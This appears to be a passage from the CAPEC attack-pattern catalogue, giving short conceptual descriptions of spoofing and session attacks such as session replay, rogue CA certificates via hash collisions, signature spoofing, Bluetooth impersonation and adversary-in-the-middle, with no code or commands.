An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-459: Creating a Rogue Certification Authority Certificate
An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.
CAPEC-461: Web Services API Signature Forgery Leveraging Hash Function Extension Weakness
An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.
CAPEC-473: Signature Spoof
An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.
CAPEC-476: Signature Spoofing by Misrepresentation
An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
CAPEC-60: Reusing Session IDs (aka Session Replay)
This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.
CAPEC-667: Bluetooth Impersonation AttackS (BIAS)
An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.
CAPEC-94: Adversary in the Middle (AiTM)
An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.